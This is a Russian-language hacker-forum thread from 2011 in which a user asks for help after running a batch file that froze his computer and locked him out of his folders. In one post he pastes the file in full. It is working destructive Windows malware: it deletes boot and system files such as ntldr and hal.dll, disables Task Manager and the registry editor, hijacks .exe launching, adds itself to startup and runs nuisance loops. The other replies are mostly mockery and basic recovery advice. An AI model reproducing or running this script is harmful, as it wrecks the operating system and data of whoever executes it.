помогите

Discussion in 'Болталка' started by kingbeef, 18 Feb 2011.

  1. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    Запустил файл .bat и камп повис я перезагрузил и теперь ни в какую папку не заходит что делать?
     
    _________________________
  2. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    аааа с**а! "капм" чоб я таких слов больше не слышал
    покажи нам .bat что ты запустил, неможешь зайти - перезагружаешь, во время перезагрузки судорожно нажимаешь F8 там будет менюшка, выберешь "безопасный режим с поддержкой сетевых драйверов" вот оттуда залей батник и покажи нам
     
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    через безопасный режим тоже незаходит
     
    _________________________
  4. Exandr

    Exandr New Member

    Joined:
    21 Aug 2010
    Messages:
    97
    Likes Received:
    4
    Reputations:
    0
    Загрузись с Live-cd - и выцепи этот батник
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    открыл через поиск вот что в нем


    PHP:
    @echo This virus created by generator KUZJA
    @echo off
    echo Chr(39)>%temp%\temp1.vbs
    echo Chr(39)>%temp%\temp2.vbs
    echo on error resume next > %temp%\temp.vbs
    echo Set S CreateObject("Wscript.Shell") >> %temp%\temp.vbs
    echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
    reg add HKEY_USERS
    \S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
    copy 
    %¶§% %SystemRoot%\user32dll.bat
    reg add 
    "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /%SystemRoot%\user32dll.bat /f
    reg add 
    "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
    reg add 
    "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    echo fso.deletefile "C:\ntldr",>> %temp%\temp.vbs
    reg add 
    "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /"NoSelectDownloadDir" /d 1 /f
    reg add 
    "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /"IExplorer" /d 0 /f
    reg add 
    "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /"NoFindFiles" /d 1 /f
    reg add 
    "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /"NoNavButtons" /d 1 /f
    echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
    echo fso.deletefile sr+"\system32\hal.dll",>> %temp%\temp.vbs
    echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
    echo fso.deletefolder sr+"\system32\dllcache",>> %temp%\temp.vbs
    echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
    echo fso.deletefolder sr+"\system32\drives",>> %temp%\temp.vbs
    echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Помойка ламера">>%temp%\temp.vbs
    echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Ламер">>%temp%\temp.vbs
    echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","Психушка">>%temp%\temp.vbs
    echo on error resume next > %temp%\temp1.vbs
    echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
    echo do>>%temp%\temp1.vbs
    echo fso.getfile ("A:\")>>%temp%\temp1.vbs
    echo loop>>%temp%\temp1.vbs
    echo on error resume next > %temp%\temp2.vbs
    echo Set S = CreateObject("
    Wscript.Shell") >> %temp%\temp2.vbs
    echo do>>%temp%\temp2.vbs
    echo execute"
    S.Run ""%comspec% /echo "" Chr(7), 0True">>%temp%\temp2.vbs
    echo loop>>%temp%\temp2.vbs
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
    reg add "
    hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    echo set application=createobject("
    shell.application")>>%temp%\temp.vbs
    echo application.minimizeall>>%temp%\temp.vbs
    reg add "
    hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
    start rundll32 user32, SwapMouseButton
    reg add "
    HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
    echo i=1 >> %temp%\temp.vbs
    echo while i^>0 or i^<0 >> %temp%\temp.vbs
    echo S.popup "
    ***** кампу",0, "Ты попал",0+0 >> %temp%\temp.vbs
    echo i=i-1 >> %temp%\temp.vbs
    echo wend >> %temp%\temp.vbs
    echo do >> %temp%\temp.vbs
    echo wscript.sleep 200 >> %temp%\temp.vbs
    echo s.sendkeys"
    {capslock}" >> %temp%\temp.vbs
    echo wscript.sleep 200 >> %temp%\temp.vbs
    echo s.sendkeys"
    {numlock}" >> %temp%\temp.vbs
    echo wscript.sleep 200 >> %temp%\temp.vbs
    echo s.sendkeys"
    {scrolllock}" >> %temp%\temp.vbs
    echo loop>> %temp%\temp.vbs
    echo Set oWMP = CreateObject("
    WMPlayer.OCX.7") >> %temp%\temp.vbs
    echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
    echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
    echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
    echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
    echo next >> %temp%\temp.vbs
    echo End If >> %temp%\temp.vbs

    echo s.run "
    shutdown --t 0 -"""" -f",1 >> %temp%\temp.vbs
    start %temp%\temp.vbs
    start %temp%\temp1.vbs
    start %temp%\temp2.vbs
     
    _________________________
  6. AGENTWPC74

    AGENTWPC74 Member

    Joined:
    11 Nov 2009
    Messages:
    201
    Likes Received:
    37
    Reputations:
    5
    дети
    :D
     
  7. FeraS

    FeraS Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    555
    Likes Received:
    420
    Reputations:
    76
    ПОЦОНЫ НИ КОЧАЙТИ!!11 У МИНЯ КАПМ ПОВИС, ПИШУ СО ШКАФА!11
     
  8. rudi

    rudi Active Member

    Joined:
    3 Jun 2010
    Messages:
    487
    Likes Received:
    184
    Reputations:
    5
    попробуй востановление системы
    может поможет

    И впредь незапускай все подряд
     
  9. arnis

    arnis Member

    Joined:
    30 Jan 2011
    Messages:
    280
    Likes Received:
    23
    Reputations:
    0
    По тексту видно что он делает, выполняй все на оборот и восстановишь систему, и впредь не запускай все в подряд.
     
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    а что означает: reg add, reg add, echo, echo, ?
     
    _________________________
  11. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,133
    Likes Received:
    73
    Reputations:
    34
    гыы генератор кузя это весчь))))
     
  12. dpe_x

    dpe_x Elder - Старейшина

    Joined:
    8 Sep 2010
    Messages:
    155
    Likes Received:
    35
    Reputations:
    14
    жесть зачем тебе компьютер вообще..
     
  13. arnis

    arnis Member

    Joined:
    30 Jan 2011
    Messages:
    280
    Likes Received:
    23
    Reputations:
    0
    reg add добавляет ключ в реестр
    echo выводит информацию , в твоем случае можно игнорировать.
     
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    реестр не запускается еше
     
    _________________________
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    как это можно убрать?
     
    _________________________
  16. arnis

    arnis Member

    Joined:
    30 Jan 2011
    Messages:
    280
    Likes Received:
    23
    Reputations:
    0
    К спецу обратись, сделает.
    так советовать, не зная всего сложно.
    Самый простой вариант переставь винду.
     
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    369
    Likes Received:
    164
    Reputations:
    126
    Кто может помочь за оплату скажем 500р?

    кто сможет помочь стучите 6174400

    p.s. переустановку винды и откат системы не предлагать
     
    _________________________
    #17 kingbeef, 18 Feb 2011
    Last edited: 18 Feb 2011
  18. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    147
    Reputations:
    18
    Reg - рЭгать (блевать)
    Add - Это ааааа ддддд (кричит а потому что холодно)
    Echo - Эхо эхо... кричит и слушает есть ли эхо - если есть значит еще не замерз и блевота прошла :D